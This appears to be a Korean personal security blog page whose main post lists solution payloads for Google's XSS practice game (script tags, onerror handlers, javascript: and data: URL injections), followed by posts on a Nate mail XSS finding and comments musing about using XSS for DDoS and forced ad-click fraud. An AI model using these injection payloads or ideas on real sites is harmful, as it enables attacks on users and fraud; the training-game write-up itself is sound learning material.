구글에서 간단한 XSS 문제를 만들어둔 것이 있어 풀어 보았다. 문제 난이도는 쉬운 수준이고 자바스크립트와 html 소스 코드만 볼줄 안다면 쉽게 풀 수 있어 초급자들이 XSS 연습을 하기에 적당한 것 같다.


문제 주소는 아래와 같으며, 풀이는 설명 없이 풀이 코드만 첨부한다.


문제 주소 : https://xss-game.appspot.com/


[풀이]

Level 1 : https://xss-game.appspot.com/level1/frame?query=<script>alert('MaJ3stY')</script>

Level 2 : <img src='foobar' onerror='alert("MaJ3stY")'>

Level 3 : https://xss-game.appspot.com/level3/frame#1?num=123' onerror='alert("MaJ3stY")'>

Level 4 : https://xss-game.appspot.com/level4/frame?timer=');alert('MaJ3stY

Level 5 : https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27MaJ3stY%27%29

Level 6 : https://xss-game.appspot.com/level6/frame#data:text/plain,alert('MaJ3stY')


모든 문제를 풀면 아래와 같이 설문조사 페이지가 나오고 XSS 기본 방어 설명이 있는 페이지의 링크를 볼 수 있다.








기사 : http://www.dailysecu.com/news_view.php?article_id=2099


기사가 올라왔네요 ^^(기사 작성해주신 길민권 기자님 감사드립니다 ^^)


예전에 네이버 말고도 동일 취약점으로 네이트 이메일도 적용이 가능하다는 것을 포스팅 한 적이 있습니다.


아래 링크 참고 !


http://maj3sty.tistory.com/696


네이트 메일에 XSS 취약점을 발견 했다.

그누보드 CSRF 취약점을 보고 급 관심이 생겨 이러저리 테스트 해보던 도중에 발견 하였다.

기본적으로 쿠키를 탈취해 다른 사용자로 임의로 로그인 할 수 있지만 네이트는 쿠키구조상 그렇게 되지 못하게 해두었다.

물론 연구하고 또 연구하면 풀릴 부분이지만 지금으로서는 쿠키로그인 말고 다른 악성코드등을 삽입하여 사용자 자체에게 피해를 주는 공격쪽이 더 어울리는 XSS 취약점이다.

더군다나 위 사진과 같이 메일 미리보기 서비스가 있어 최신글에 XSS 악성코드가 삽입되어 있다면 클릭하지 않아도 XSS 코드가 실행될 수 있다는 단점이 있어 더 주의가 요구 되는 부분이다.
  1. 알 수 없는 사용자 2011.01.05 18:44

    재미있는 네이트닷컴 쿠키의 구조 ㅡㅡㅋ

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2011.01.05 18:50 신고

      우린 어차피 공격자가 아니니까 거기까지 생각은 안해도 될거 같아요 ㅎㅎ

      제가 생각할때 저 취약점은 DDOS 공격에 사용해도 좋을꺼 같아요 스크립트를 백그라운드로 돌려버리면 컴터 꺼지기 전까지는 네이트 메일 읽었던 사람들이 모두 공격할테니... ㅎㅎ

  2. 2011.01.06 17:54

    비밀댓글입니다

돈과 직결된 엄청나게 위험한 상상을 해봤어요

tistory에 있는 xss 취약점을 이용해서 돈을 벌 수 있다는 상상을 해봤는데요.

xss 취약점을 이용해서 구글광고 클릭을 하게 하는거에요 ㅎ

제가 찾은 취약점은 블로그에 들어오기만 해도 발생되는거니까 스크립트로 광고가 오픈되게끔만 해 두면 제 블로그에 들어오는 것만으로도 저는 수익을 얻게 되죠 ㅎ

간혹 이런 무서운 상상을 하곤 하는데 이런 상상을 제가 여기다 적어놓고 상상을 한다고 해서 실행하는건 절대 아니랍니다. ㅎ

그냥 상상일 뿐이죠 ㅎ

이 상상을 실현하시는 분은 절대 없을거라 보구요.

이 상상을 현실화 하시는분이 만약 이 상상으로 인해 해를 입는다고 하셔도 저와는 무관하다는 것을 일단 알려드립니다 ^^

그럼 모두 더운데 수고하세요 ~

'[+] My Think and LIfe > [-] ETC' 카테고리의 다른 글

윈도우7 교체 완료!!!  (0) 2011.07.21
ㅠㅠ..  (0) 2011.01.06
위험한 상상?  (6) 2010.08.07
중국 밀웜  (0) 2010.04.18
군대 입니다.  (12) 2010.03.13
  1. Favicon of http://cs______.blog.me BlogIcon 호빵 2010.08.09 01:56

    ㅜ 순간 경고창떠서 쫄았다는...
    저도 최근에 그런생각 한적이 있는 ㄲㄲ

  2. Favicon of https://everyread.tistory.com BlogIcon 김병국 2010.08.13 17:32 신고

    구글에서 불법 클릭은 잘 찾더라구요. ^^;

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2010.08.14 19:35 신고

      음 불법클릭이라 .... 어떤 패턴이려나 ㅎㅎㅎ

      그것도 한번 연구해볼만하겠는데요? ㅎ

  3. Favicon of https://88oy.tistory.com BlogIcon ☆> 2011.01.12 08:53 신고

    네 구글에서 불법클릭을 엄청 잘잡죠

    너무 잘잡아서 때로는 불법클릭이 아닌데도 불법클릭이 되기도 하구요 ㅎㅎ

    1000명이 들어와서 1000명이 클릭하면 불법클릭으로 간주하는거 같습니다 -ㅁ-

    평균도 내는거 같구요 알고리즘이 다양하기때문에 ...

    연구를 실행으로 하시다보면... 정지먹어욤 ㅎㅎ 조심하세요 ㅎ

+ Recent posts